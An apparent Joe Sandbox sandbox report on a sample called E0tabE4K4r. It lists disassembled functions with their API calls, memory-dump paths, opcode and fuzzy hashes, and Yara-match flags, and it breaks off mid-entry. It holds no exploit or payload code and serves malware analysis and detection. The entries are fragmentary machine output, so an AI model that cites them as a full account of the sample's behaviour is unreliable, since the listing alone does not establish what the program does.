                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 43408053-0
                                                                                                                                                    • Opcode ID: f30f2909b0e6966c8349e1fbc57d2510c8581044e4dacd678c6ac56155501760
                                                                                                                                                    • Instruction ID: 8c7853d0990174e1d324bf0a9c7916a341c7875370b4ce6b9d59b46285b3294a
                                                                                                                                                    • Opcode Fuzzy Hash: f30f2909b0e6966c8349e1fbc57d2510c8581044e4dacd678c6ac56155501760
                                                                                                                                                    • Instruction Fuzzy Hash: 4A2148719522059BCB119F75C8057DA7F60AF423A8F28835AE6605B2F3C77C8582DF8D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040CE5C Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __lock.LIBCMT ref: 0040CDB3
                                                                                                                                                      • Part of subcall function 004077EF: __mtinitlocknum.LIBCMT ref: 00407805
                                                                                                                                                      • Part of subcall function 004077EF: __amsg_exit.LIBCMT ref: 00407811
                                                                                                                                                      • Part of subcall function 004077EF: EnterCriticalSection.KERNEL32(00402E5E,00402E5E,?,00404710,00000004,004B7400,0000000C,0040DD71,0040115A,00402E6D,00000000,00000000,00000000,?,0040BB30,00000001), ref: 00407819
                                                                                                                                                    • InterlockedDecrement.KERNEL32(00000000), ref: 0040CDC5
                                                                                                                                                      • Part of subcall function 0040DC2C: __lock.LIBCMT ref: 0040DC4A
                                                                                                                                                      • Part of subcall function 0040DC2C: ___sbh_find_block.LIBCMT ref: 0040DC55
                                                                                                                                                      • Part of subcall function 0040DC2C: ___sbh_free_block.LIBCMT ref: 0040DC64
                                                                                                                                                      • Part of subcall function 0040DC2C: HeapFree.KERNEL32(00000000,0040115A,004B7618,0000000C,004077D0,00000000,004B7460,0000000C,0040780A,0040115A,00402E5E,?,00404710,00000004,004B7400,0000000C), ref: 0040DC94
                                                                                                                                                      • Part of subcall function 0040DC2C: GetLastError.KERNEL32(?,00404710,00000004,004B7400,0000000C,0040DD71,0040115A,00402E6D,00000000,00000000,00000000,?,0040BB30,00000001,00000214), ref: 0040DCA5
                                                                                                                                                    • __lock.LIBCMT ref: 0040CDF3
                                                                                                                                                    • ___removelocaleref.LIBCMT ref: 0040CE02
                                                                                                                                                    • ___freetlocinfo.LIBCMT ref: 0040CE1B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __lock$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref___sbh_find_block___sbh_free_block__amsg_exit__mtinitlocknum
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1907232653-0
                                                                                                                                                    • Opcode ID: b520833dd8777c2ce9203692ce8ffd30dc46aafdc476cc7ce227a1ca833f09a5
                                                                                                                                                    • Instruction ID: a46226c947575e10ece111353bfe2e252e9477d37ae127b0086ac39066c9c4b1
                                                                                                                                                    • Opcode Fuzzy Hash: b520833dd8777c2ce9203692ce8ffd30dc46aafdc476cc7ce227a1ca833f09a5
                                                                                                                                                    • Instruction Fuzzy Hash: 1E113D71905200D6DB206FA9D98675E7694AF00754F204A3FE054BB2D1DB7CAD80D6AD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C48B Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __getptd.LIBCMT ref: 0040C497
                                                                                                                                                      • Part of subcall function 0040BB7E: __getptd_noexit.LIBCMT ref: 0040BB81
                                                                                                                                                      • Part of subcall function 0040BB7E: __amsg_exit.LIBCMT ref: 0040BB8E
                                                                                                                                                    • __amsg_exit.LIBCMT ref: 0040C4B7
                                                                                                                                                    • __lock.LIBCMT ref: 0040C4C7
                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040C4E4
                                                                                                                                                    • InterlockedIncrement.KERNEL32(02262C58), ref: 0040C50F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4271482742-0
                                                                                                                                                    • Opcode ID: 6cd6a32fc7b990bba9b90888077096d0f33b779f108f0592a3e40262c93d1c04
                                                                                                                                                    • Instruction ID: 955e489172e778f381adf6ed49ef7aa4f9f69237033c0c0a47c94e26fb88899e
                                                                                                                                                    • Opcode Fuzzy Hash: 6cd6a32fc7b990bba9b90888077096d0f33b779f108f0592a3e40262c93d1c04
                                                                                                                                                    • Instruction Fuzzy Hash: E2013C31D01621EBC711AF69988676EB6A0BB04714F10423BE901776D0CB3C6C42DADE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040DC2C Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __lock.LIBCMT ref: 0040DC4A
                                                                                                                                                      • Part of subcall function 004077EF: __mtinitlocknum.LIBCMT ref: 00407805
                                                                                                                                                      • Part of subcall function 004077EF: __amsg_exit.LIBCMT ref: 00407811
                                                                                                                                                      • Part of subcall function 004077EF: EnterCriticalSection.KERNEL32(00402E5E,00402E5E,?,00404710,00000004,004B7400,0000000C,0040DD71,0040115A,00402E6D,00000000,00000000,00000000,?,0040BB30,00000001), ref: 00407819
                                                                                                                                                    • ___sbh_find_block.LIBCMT ref: 0040DC55
                                                                                                                                                    • ___sbh_free_block.LIBCMT ref: 0040DC64
                                                                                                                                                    • HeapFree.KERNEL32(00000000,0040115A,004B7618,0000000C,004077D0,00000000,004B7460,0000000C,0040780A,0040115A,00402E5E,?,00404710,00000004,004B7400,0000000C), ref: 0040DC94
                                                                                                                                                    • GetLastError.KERNEL32(?,00404710,00000004,004B7400,0000000C,0040DD71,0040115A,00402E6D,00000000,00000000,00000000,?,0040BB30,00000001,00000214), ref: 0040DCA5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2714421763-0
                                                                                                                                                    • Opcode ID: 84c7277c10bc954a5ac3a63cb2f22786c803425979b55c78608d589f07fa49ff
                                                                                                                                                    • Instruction ID: a2d80572573ee78c7694966ff36a9ca16bfa777fc0a5088982a9df981b4514f6
                                                                                                                                                    • Opcode Fuzzy Hash: 84c7277c10bc954a5ac3a63cb2f22786c803425979b55c78608d589f07fa49ff
                                                                                                                                                    • Instruction Fuzzy Hash: CD014471C09202ABEB246BB19D09B5F7664AF40768F14453FF440761C1DBBC9945CA9D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02282670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: D
                                                                                                                                                    • API String ID: 2102423945-2746444292
                                                                                                                                                    • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                    • Instruction ID: 6fc7991ed61ed2cfef49f36a847c1ebffa767fed128bb9d1a4a270622581ee7b
                                                                                                                                                    • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                    • Instruction Fuzzy Hash: 6FE17B71D1125AEACF24EFE0CD49FEEB7B8BF04304F144169E909A2194EB74AA45CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0227D8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: $$$(
                                                                                                                                                    • API String ID: 2102423945-3551151888
                                                                                                                                                    • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                    • Instruction ID: fcba6cedb4640f4a4d7b4df1fcd1d9ce711aca95422f66cd0374d2cdc206be96
                                                                                                                                                    • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                    • Instruction Fuzzy Hash: B5919971D14219EAEF20DFE0C849BEEBBB9AF05308F244169D405772C4DBB65A48CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02295CE1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsnlen
                                                                                                                                                    • String ID: U
                                                                                                                                                    • API String ID: 3628947076-3372436214
                                                                                                                                                    • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                                    • Instruction ID: 5b951aee0f40e68e378311065c1a69a01c9fff40f4053ed4b5ce9b362a30c306
                                                                                                                                                    • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                                    • Instruction Fuzzy Hash: 8D2108327343096EEF019AE8EC45BBE739DDB46360F904165F908C6198FF71E9508AA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004AF73D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,004AEA52), ref: 004AF742
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004AF752
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                    • API String ID: 1646373207-3105848591
                                                                                                                                                    • Opcode ID: d1109ab3b6b40d5e42e38ddb3a82243b8a812cb7cff8b4a205699159ebba6f6a
                                                                                                                                                    • Instruction ID: cd2b0e87a6b710e98414d91b6b4a50f1357282ef8dfc444fbd5717473315ee90
                                                                                                                                                    • Opcode Fuzzy Hash: d1109ab3b6b40d5e42e38ddb3a82243b8a812cb7cff8b4a205699159ebba6f6a
                                                                                                                                                    • Instruction Fuzzy Hash: 7AF03030A04A09E3DF002BF5AD4E7AF7A78BBD1701F9106A1D191A02D4DF748475C26A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004AE24D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 004AE283
                                                                                                                                                    • SetVolumeLabelW.KERNEL32(jowuharatapiyilijadezumadayeduje,jokediteroviwedarafinayog), ref: 004AE2BE
                                                                                                                                                    Strings
                                                                                                                                                    • jokediteroviwedarafinayog, xrefs: 004AE2B4
                                                                                                                                                    • jowuharatapiyilijadezumadayeduje, xrefs: 004AE2B9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileLabelModuleNameVolume
                                                                                                                                                    • String ID: jokediteroviwedarafinayog$jowuharatapiyilijadezumadayeduje
                                                                                                                                                    • API String ID: 2532863745-3932108595
                                                                                                                                                    • Opcode ID: 66e06d5868ccb87f9cc07d59de1f8b71f66da0ed3d088fee97bd409b7bc877d5
                                                                                                                                                    • Instruction ID: 320b0a1784753f17a15391afb79f0fc580262410a7f4ec04cd11e2f4969b9304
                                                                                                                                                    • Opcode Fuzzy Hash: 66e06d5868ccb87f9cc07d59de1f8b71f66da0ed3d088fee97bd409b7bc877d5
                                                                                                                                                    • Instruction Fuzzy Hash: AB01A272A40218DBD760EF58ED89B997BF4EB08308F000139E154AA190DF7C6648CF99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004AE2E1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateJobObjectW.KERNEL32(00000000,loyusotonofasuba), ref: 004AE2F9
                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 004AE319
                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 004AE323
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFreeFrequencyHeapObjectPerformanceQuery
                                                                                                                                                    • String ID: loyusotonofasuba
                                                                                                                                                    • API String ID: 222607030-4020407174
                                                                                                                                                    • Opcode ID: af67883dfef598ddb9daaf912bded3e25f8addfcfc1902ed6d68e6655ec3a5ad
                                                                                                                                                    • Instruction ID: dc6479cd36204a0f592e46fa6af8401fa32a5e0ea0bf87b26b2acfb8e1a5280d
                                                                                                                                                    • Opcode Fuzzy Hash: af67883dfef598ddb9daaf912bded3e25f8addfcfc1902ed6d68e6655ec3a5ad
                                                                                                                                                    • Instruction Fuzzy Hash: D3E04834644315BFEF545B50EC49F457BA8A714B05F100275F105A61D0D6B4A5448BAC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0228A810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: p2Q
                                                                                                                                                    • API String ID: 2102423945-1521255505
                                                                                                                                                    • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                                    • Instruction ID: 8bcbb12810dcfcd8aa047bbed23bb45ef88040b1ccc6216631bee556e3278d40
                                                                                                                                                    • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                                    • Instruction Fuzzy Hash: 82F0E578694750A5F711B794BC267857D917B31F09F104044E1142E2E5D3FD234C67D9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 022BFBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 022BFBF1
                                                                                                                                                      • Part of subcall function 022A169C: std::exception::_Copy_str.LIBCMT ref: 022A16B5
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 022BFC06
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                                                                                                                                    • String ID: TeM$TeM
                                                                                                                                                    • API String ID: 3662862379-3870166017
                                                                                                                                                    • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                    • Instruction ID: 96a48444423abe55661f6933b88bc85d8598bda2cc1fc3fefa888bcfb72c5b97
                                                                                                                                                    • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                    • Instruction Fuzzy Hash: 0DD06775C0030CBBCB04EFA5D459CDDBBB9AA04744F408466A91897645EA74A3598F94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0227D0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0229197D: __wfsopen.LIBCMT ref: 02291988
                                                                                                                                                    • _fgetws.LIBCMT ref: 0227D15C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wfsopen_fgetws
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 853134316-0
                                                                                                                                                    • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                    • Instruction ID: 8ddc881c30c1524ca1dbb2db9ad9a51284ef6ed643259b56c5e1d3223a5992bb
                                                                                                                                                    • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                    • Instruction Fuzzy Hash: E591E271D2431AABCF20DFE4CD84BAEB7B5BF14304F140529E819A7244E7B5AA14CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0227D540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1783060780-0
                                                                                                                                                    • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                                    • Instruction ID: eff03cc3754a7b6ccf2a070718eb33511f3ec099016bcbedb12b9e6640c13059
                                                                                                                                                    • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                                    • Instruction Fuzzy Hash: E2A17EB0C14349EBEF11EFE4CC45BDEBB76AF14308F240128D4057A295DBB65A48CBA6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02292AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2974526305-0
                                                                                                                                                    • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                                    • Instruction ID: ead5751f76a69fd4ccd7e7ff4e463bfc518b11b69398ce2830e7b754bcd1598b
                                                                                                                                                    • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                                    • Instruction Fuzzy Hash: 70519171A20306EBDF298FF988906AEB7F6BF40324F148729EC35962D8D7719955CB40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004112A0 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004112D4
                                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 00411308
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,00000000,?,?,00000000), ref: 00411339
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,00000000,?,?,00000000), ref: 004113A7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
